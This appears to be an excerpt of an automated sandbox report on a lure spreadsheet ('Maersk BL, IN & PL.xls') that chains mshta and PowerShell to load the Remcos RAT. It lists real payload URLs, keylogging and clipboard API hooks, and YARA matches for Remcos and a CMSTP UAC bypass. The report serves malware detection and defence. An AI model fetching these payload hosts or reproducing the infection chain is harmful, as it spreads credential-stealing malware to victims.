                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.509507679.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: RegAsm.exe, 0000001D.00000002.508846937.000000000036C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/PK
                    Source: RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://www.msn.com/
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                    Source: RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: RegAsm.exe, 0000001A.00000002.511931373.0000000000334000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://contextual.media.net/
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                    Source: powershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: powershell.exe, 0000000E.00000002.494455760.00000000025A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org
                    Source: powershell.exe, 0000001E.00000002.528837930.0000000002772000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.546607797.000000001A8A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
                    Source: powershell.exe, 0000000E.00000002.494455760.00000000025A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C1F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.530346179.000000001AAEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.546607797.000000001A8D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.527099741.000000000037D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447936194.000000000040F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448574123.000000000040F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/
                    Source: mshta.exe, 0000000F.00000002.493401443.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493427429.0000000000250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492748708.000000000024F000.00000004.00000020.00020000.00000000.sdmp, Maersk BL, IN & PL.xls, 6E530000.0.drString found in binary or memory: https://wrath.me/DeSHzc
                    Source: mshta.exe, 0000000F.00000002.493401443.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/DeSHzcBU
                    Source: mshta.exe, 0000000F.00000002.493401443.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/DeSHzcFU
                    Source: mshta.exe, 00000004.00000002.448719832.0000000003670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448403328.0000000003670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/DeSHzcon.htaJ
                    Source: mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/DeSHzcon.htaVU
                    Source: mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/F
                    Source: mshta.exe, 0000000F.00000002.493635513.0000000003770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/YZ
                    Source: mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/_
                    Source: mshta.exe, 00000004.00000003.447936194.000000000040F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448574123.000000000040F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/b
                    Source: mshta.exe, 0000000F.00000002.493635513.0000000003770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/lZ
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000031_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0041183A OpenClipboard,GetLastError,26_2_0041183A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,26_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,28_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,28_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,29_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,29_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,31_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,31_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,31_2_0040A41B
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.527567335.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879261278.0000000000895000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.0000000000901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.880062392.0000000000D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CA73 SystemParametersInfoW,31_2_0041CA73

                    System Summary

                    barindex
                    Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
